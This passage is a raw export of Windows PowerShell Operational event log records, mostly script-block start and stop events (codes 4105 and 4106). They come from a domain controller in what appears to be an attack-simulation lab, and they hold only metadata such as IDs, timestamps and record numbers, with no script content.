Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479012
Keywords=None
Message=Started invocation of ScriptBlock ID: 1ef9c228-b78e-4897-b91e-9c995c7fd3bc
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479011
Keywords=None
Message=Completed invocation of ScriptBlock ID: 62c73b10-ce47-4819-a622-55e5c86121c9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479010
Keywords=None
Message=Started invocation of ScriptBlock ID: 62c73b10-ce47-4819-a622-55e5c86121c9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479009
Keywords=None
Message=Completed invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479008
Keywords=None
Message=Started invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479007
Keywords=None
Message=Completed invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479006
Keywords=None
Message=Started invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479005
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479004
Keywords=None
Message=Started invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479003
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479002
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1479001
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1479000
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478999
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478998
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478997
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478996
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478995
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478994
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478993
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478992
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478991
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478990
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478989
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478988
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478987
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478986
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478985
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478984
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478983
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478982
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478981
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478980
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478979
Keywords=None
Message=Completed invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478978
Keywords=None
Message=Started invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478977
Keywords=None
Message=Completed invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478976
Keywords=None
Message=Started invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478975
Keywords=None
Message=Completed invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478974
Keywords=None
Message=Started invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478973
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478972
Keywords=None
Message=Started invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478971
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478970
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478969
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478968
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478967
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478966
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478965
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478964
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478963
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478962
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478961
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478960
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478959
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478958
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478957
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:24 PM
LogName=Microsoft-Windows-PowerShell/Operational
